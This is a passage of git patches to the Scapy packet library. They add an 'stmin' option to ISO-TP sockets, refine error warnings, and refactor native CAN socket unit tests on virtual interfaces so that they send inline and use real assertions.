data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) + +packetsVCan0 = sock0.sniff(timeout=0.3, count=4) +packetsVCan1 = sock1.sniff(timeout=0.3, count=6) +assert len(packetsVCan0) == 4 +assert len(packetsVCan1) == 6 sock0.close() sock1.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) +assert not threadBridge.is_alive() =bridge and sniff setup vcan0 package remove sock0 = CANSocket(bustype='socketcan', channel='vcan0') sock1 = CANSocket(bustype='socketcan', channel='vcan1') -def senderVCan0(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - bridgeStarted = threading.Event() def bridgeWithRemovePackageFromVCan0ToVCan1(): global bridgeStarted @@ -540,36 +488,36 @@ def bridgeWithRemovePackageFromVCan0ToVCan1(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=6) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithRemovePackageFromVCan0ToVCan1) threadBridge.start() -threadSender = threading.Thread(target=senderVCan0) -bridgeStarted.wait() +bridgeStarted.wait(timeout=1) + +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) -packetsVCan1 = sock1.sniff(timeout=0.3, started_callback=threadSender.start) +packetsVCan1 = sock1.sniff(timeout=0.3, count=5) -len(packetsVCan1) == 5 +assert len(packetsVCan1) == 5 sock0.close() sock1.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) +assert not threadBridge.is_alive() =bridge and sniff setup vcan1 package remove sock0 = CANSocket(bustype='socketcan', channel='vcan0') sock1 = CANSocket(bustype='socketcan', channel='vcan1') -def senderVCan1(): - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridgeWithRemovePackageFromVCan1ToVCan0(): global bridgeStarted @@ -583,24 +531,28 @@ def bridgeWithRemovePackageFromVCan1ToVCan0(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=4) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithRemovePackageFromVCan1ToVCan0) threadBridge.start() -threadSender = threading.Thread(target=senderVCan1) -bridgeStarted.wait() +bridgeStarted.wait(timeout=1) + +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.3, started_callback=threadSender.start) +packetsVCan0 = sock0.sniff(timeout=0.3, count=3) -len(packetsVCan0) == 3 +assert len(packetsVCan0) == 3 sock0.close() sock1.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) +assert not threadBridge.is_alive() =bridge and sniff setup vcan0 and vcan1 package remove both directions @@ -608,18 +560,6 @@ threadSender.join(timeout=3) sock0 = CANSocket(bustype='socketcan', channel='vcan0') sock1 = CANSocket(bustype='socketcan', channel='vcan1') -def senderBothVCans(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridgeWithRemovePackageInBothDirections(): global bridgeStarted @@ -639,20 +579,33 @@ def bridgeWithRemovePackageInBothDirections(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnrA, xfrm21=pnrB, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnrA, xfrm21=pnrB, timeout=0.5, started_callback=bridgeStarted.set, count=10) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithRemovePackageInBothDirections) threadBridge.start() -threadSender = threading.Thread(target=senderBothVCans) -bridgeStarted.wait() +bridgeStarted.wait(timeout=1) -packetsVCan0 = sock0.sniff(timeout=0.3, started_callback=threadSender.start) -packetsVCan1 = sock1.sniff(timeout=0.3) +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -len(packetsVCan0) == 3 -len(packetsVCan1) == 5 +packetsVCan0 = sock0.sniff(timeout=0.3, count=3) +packetsVCan1 = sock1.sniff(timeout=0.3, count=5) + +assert len(packetsVCan0) == 3 +assert len(packetsVCan1) == 5 + +threadBridge.join(timeout=3) +assert not threadBridge.is_alive() sock0.close() sock1.close() From 9a4cb6c18e7a4e2ade3de4c40aea3fad1a95e8ff Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 31 Aug 2021 14:00:46 +0200 Subject: [PATCH 0636/1632] Add stmin argument to ISOTPNativeSocket (#3310) * Add stmin argument to ISOTPNativeSocket * update * fix codacy --- scapy/contrib/isotp/isotp_native_socket.py | 16 ++++++++++++---- scapy/contrib/isotp/isotp_soft_socket.py | 8 ++++---- test/contrib/isotp.uts | 2 +- 3 files changed, 17 insertions(+), 9 deletions(-) diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 13ec1be2e48..a5dc89a4097 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -269,6 +269,7 @@ def __init__(self, listen_only=False, # type: bool padding=False, # type: bool transmit_time=100, # type: int + stmin=0, # type: int basecls=ISOTP # type: Type[Packet] ): # type: (...) -> None @@ -304,7 +305,8 @@ def __init__(self, self.can_socket.setsockopt(SOL_CAN_ISOTP, CAN_ISOTP_RECV_FC, - self.__build_can_isotp_fc_options()) + self.__build_can_isotp_fc_options( + stmin=stmin)) self.can_socket.setsockopt(SOL_CAN_ISOTP, CAN_ISOTP_LL_OPTS, self.__build_can_isotp_ll_options()) @@ -335,10 +337,16 @@ def recv_raw(self, x=0xffff): except socket.timeout: warning('Captured no data, socket read timed out.') return None, None, None - except OSError: + except OSError as e: # something bad happened (e.g. the interface went down) - warning("Captured no data.") - self.close() + warning("Captured no data. %s" % e) + if e.errno == 84: + warning("Maybe a consecutive frame was missed. " + "Increasing `stmin` could solve this problem.") + elif e.errno == 110: + warning('Captured no data, socket read timed out.') + else: + self.close() return None, None, None if ts is None: diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index ef6e1dd4a45..539f94f21ff 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -97,8 +97,8 @@ class ISOTPSoftSocket(SuperSocket): :param extended_rx_addr: the extended address of the received ISOTP frames (can be None) :param rx_block_size: block size sent in Flow Control ISOTP frames - :param rx_separation_time_min: minimum desired separation time sent in - Flow Control ISOTP frames + :param stmin: minimum desired separation time sent in + Flow Control ISOTP frames :param padding: If True, pads sending packets with 0x00 which not count to the payload. Does not affect receiving packets. @@ -114,7 +114,7 @@ def __init__(self, extended_addr=None, # type: Optional[int] extended_rx_addr=None, # type: Optional[int] rx_block_size=0, # type: int - rx_separation_time_min=0, # type: int + stmin=0, # type: int padding=False, # type: bool listen_only=False, # type: bool basecls=ISOTP # type: Type[Packet] @@ -140,7 +140,7 @@ def __init__(self, extended_addr=extended_addr, extended_rx_addr=extended_rx_addr, rx_block_size=rx_block_size, - rx_separation_time_min=rx_separation_time_min, + rx_separation_time_min=stmin, listen_only=listen_only ) diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 622b362284f..a9ce1bbff2a 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1609,7 +1609,7 @@ assert(result[0].data == isotp.data) = Two ISOTPSockets at the same time, sending and receiving with tx_gap -with new_can_socket0() as cs1, ISOTPSocket(cs1, sid=0x641, did=0x241, rx_separation_time_min=1) as s1, \ +with new_can_socket0() as cs1, ISOTPSocket(cs1, sid=0x641, did=0x241, stmin=1) as s1, \ new_can_socket0() as cs2, ISOTPSocket(cs2, sid=0x241, did=0x641) as s2: isotp = ISOTP(data=b"\x10\x25" * 43) def sender(): From 6f6d1ffe3e224177e1988ed03b36a98fa8f2da95 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 31 Aug 2021 14:01:04 +0200 Subject: [PATCH 0637/1632] Cleanup unit tests for NativeCANSocket (#3316) --- test/contrib/cansocket_native.uts | 525 +++++++++++++----------------- 1 file changed, 224 insertions(+), 301 deletions(-) diff --git a/test/contrib/cansocket_native.uts b/test/contrib/cansocket_native.uts index b1fd44da0e9..e5dae7a5ec9 100644 --- a/test/contrib/cansocket_native.uts +++ b/test/contrib/cansocket_native.uts @@ -1,5 +1,5 @@ % Regression tests for nativecansocket -~ python3_only not_pypy vcan_socket needs_root linux disabled +~ python3_only not_pypy vcan_socket needs_root linux # More information at http://www.secdev.org/projects/UTscapy/ @@ -26,12 +26,12 @@ from time import sleep from subprocess import call = Setup vcan0 -0 == os.system(bashCommand) +assert 0 == os.system(bashCommand) + Basic Packet Tests() = CAN Packet init canframe = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') -bytes(canframe) == b'\x00\x00\x07\xff\x08\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08' +assert bytes(canframe) == b'\x00\x00\x07\xff\x08\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08' + Basic Socket Tests() = CAN Socket Init @@ -41,88 +41,69 @@ sock1 = CANSocket(channel="vcan0") conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': False} -def sender(): - sleep(0.1) - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) - sock2.close() +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) +sock2.close() -thread = threading.Thread(target=sender) -thread.start() rx = sock1.recv() print(repr(rx)) -rx == CAN(identifier=0x7ff,length=1,data=b'\x01') / Padding(b"\x00" * 7) -thread.join(timeout=5) +assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') / Padding(b"\x00" * 7) + = CAN Socket send recv small packet conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': True} -def sender(): - sleep(0.1) - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) - sock2.close() +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) +sock2.close() -thread = threading.Thread(target=sender) -thread.start() rx = sock1.recv() print(repr(rx)) -rx == CAN(identifier=0x7ff,length=1,data=b'\x01') -thread.join(timeout=5) +assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') = CAN Socket send recv -def sender(): - sleep(0.1) - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.close() - -thread = threading.Thread(target=sender) -thread.start() + + +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() + rx = sock1.recv() -rx == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') -thread.join(timeout=5) +assert rx == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') = CAN Socket basecls test -def sender(): - sleep(0.1) - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.close() + + +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() sock1.basecls = Raw -thread = threading.Thread(target=sender) -thread.start() rx = sock1.recv() -rx == Raw(bytes(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'))) +assert rx == Raw(bytes(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'))) sock1.basecls = CAN -thread.join(timeout=5) + Advanced Socket Tests() = CAN Socket sr1 tx = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') = CAN Socket sr1 init time -tx.sent_time == None +assert tx.sent_time == None -def sender(): - sleep(0.1) - sock2 = CANSocket(channel="vcan0") - sock2.send(tx) - sock2.close() +sock2 = CANSocket(channel="vcan0") +sock2.send(tx) +sock2.close() -thread = threading.Thread(target=sender) -thread.start() rx = None rx = sock1.sr1(tx, verbose=False, timeout=3) -rx == tx +assert rx == tx sock1.close() -thread.join(timeout=5) = CAN Socket sr1 time check -assert tx.sent_time < rx.time and rx.time > 0 +assert abs(tx.sent_time - rx.time) < 0.1 +assert rx.time > 0 = sr can tx = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') @@ -130,186 +111,165 @@ tx = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') = sr can check init time assert tx.sent_time == None -def sender(): - sleep(0.1) - sock2 = CANSocket(channel="vcan0") - sock2.send(tx) - sock2.close() - sock1 = CANSocket(channel="vcan0") -thread = threading.Thread(target=sender) -thread.start() + +sock2 = CANSocket(channel="vcan0") +sock2.send(tx) +sock2.close() + rx = None rx = sock1.sr(tx, timeout=1, verbose=False) rx = rx[0][0][1] assert tx == rx -thread.join(timeout=5) + = srcan check init time basecls +sock1 = CANSocket(channel="vcan0", basecls=Raw) -def sender(): - sleep(0.1) - sock2 = CANSocket(channel="vcan0") - sock2.send(tx) - sock2.close() +sock2 = CANSocket(channel="vcan0") +sock2.send(tx) +sock2.close() -sock1 = CANSocket(channel="vcan0", basecls=Raw) -thread = threading.Thread(target=sender) -thread.start() rx = None rx = sock1.sr(tx, timeout=1, verbose=False) rx = rx[0][0][1] assert Raw(bytes(tx)) == rx -thread.join(timeout=5) -= sr can check rx and tx +sock1.close() += sr can check rx and tx assert tx.sent_time > 0 and rx.time > 0 and tx.sent_time < rx.time = sniff with filtermask 0x7ff - sock1 = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}]) -def sender(): - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x100, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.close() - -thread = threading.Thread(target=sender) -packets = sock1.sniff(timeout=0.2, started_callback=thread.start, verbose=False) -len(packets) == 3 - +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x100, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() + +packets = sock1.sniff(timeout=0.1, verbose=False, count=3) +assert len(packets) == 3 sock1.close() -thread.join(timeout=5) = sniff with filtermask 0x700 - sock1 = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x700}]) -def sender(): - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(identifier=0x212, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x2ff, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x1ff, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x2aa, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.close() +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(identifier=0x212, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x2ff, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x1ff, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x2aa, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() -thread = threading.Thread(target=sender) -packets = sock1.sniff(timeout=0.2, started_callback=thread.start, verbose=False) -len(packets) == 4 +packets = sock1.sniff(timeout=0.1, verbose=False, count=4) +assert len(packets) == 4 sock1.close() -thread.join(timeout=5) = sniff with filtermask 0x0ff sock1 = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x0ff}]) -def sender(): - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x301, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x1ff, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x700, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x100, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.close() +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x301, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x1ff, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x700, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x100, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() -thread = threading.Thread(target=sender) -packets = sock1.sniff(timeout=0.2, started_callback=thread.start, verbose=False) -len(packets) == 4 +packets = sock1.sniff(timeout=0.1, verbose=False, count=4) +assert len(packets) == 4 sock1.close() -thread.join(timeout=5) = sniff with multiple filters sock1 = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}, {'can_id': 0x400, 'can_mask': 0x7ff}, {'can_id': 0x600, 'can_mask': 0x7ff}, {'can_id': 0x7ff, 'can_mask': 0x7ff}]) -def sender(): - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x400, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x500, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x600, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x700, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x7ff, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.close() - -thread = threading.Thread(target=sender) -packets = sock1.sniff(timeout=0.2, started_callback=thread.start, verbose=False) -len(packets) == 4 +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x400, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x500, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x600, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x700, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x7ff, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() + +packets = sock1.sniff(timeout=0.1, verbose=False, count=4) +assert len(packets) == 4 sock1.close() -thread.join(timeout=5) = sniff with filtermask 0x7ff and inverse filter sock1 = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x200 | CAN_INV_FILTER, 'can_mask': 0x7ff}]) -def sender(): - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x100, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.close() +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x300, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x100, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() -thread = threading.Thread(target=sender) -packets = sock1.sniff(timeout=0.2, started_callback=thread.start, verbose=False) -len(packets) == 2 +packets = sock1.sniff(timeout=0.1, verbose=False, count=2) +assert len(packets) == 2 sock1.close() -thread.join(timeout=5) = sniff with filtermask 0x1FFFFFFF sock1 = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x10000000, 'can_mask': 0x1fffffff}]) -def sender(): - sock2 = CANSocket(channel="vcan0") - sock2.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock2.close() +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() -thread = threading.Thread(target=sender) -packets = sock1.sniff(timeout=0.2, started_callback=thread.start, verbose=False) -len(packets) == 2 +packets = 